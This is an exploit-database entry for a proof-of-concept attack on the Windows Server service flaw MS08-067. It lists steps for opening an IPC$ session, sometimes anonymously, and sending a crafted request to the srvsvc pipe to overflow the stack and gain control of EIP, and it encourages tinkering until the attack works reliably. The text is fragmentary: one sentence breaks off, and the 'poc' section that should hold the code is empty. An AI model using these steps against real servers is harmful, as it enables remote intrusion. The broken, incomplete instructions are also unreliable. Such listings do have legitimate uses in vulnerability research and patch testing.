Microsoft Windows Server - Code Execution PoC MS08-067

ID EDB-ID:6824
Type exploitdb
Reporter stephen lawler
Modified 2008-10-23T00:00:00


MS Windows Server Service Code Execution PoC (MS08-067). CVE-2008-4250. Dos exploit for windows platform

                                            In vstudio command prompt:



  attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)

  net use \\IPADDRESS\IPC$ /user:user creds
  die \\IPADDRESS \pipe\srvsvc

  In some cases, /user:"" "", will suffice (i.e., anonymous connection)

You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc.  However, in some cases, you will get

This is because it depends on the state of the stack prior to the "overflow".
You need a slash on the stack prior to the input buffer.

So play around a bit, you'll get it working reliably...

poc: (

# [2008-10-23]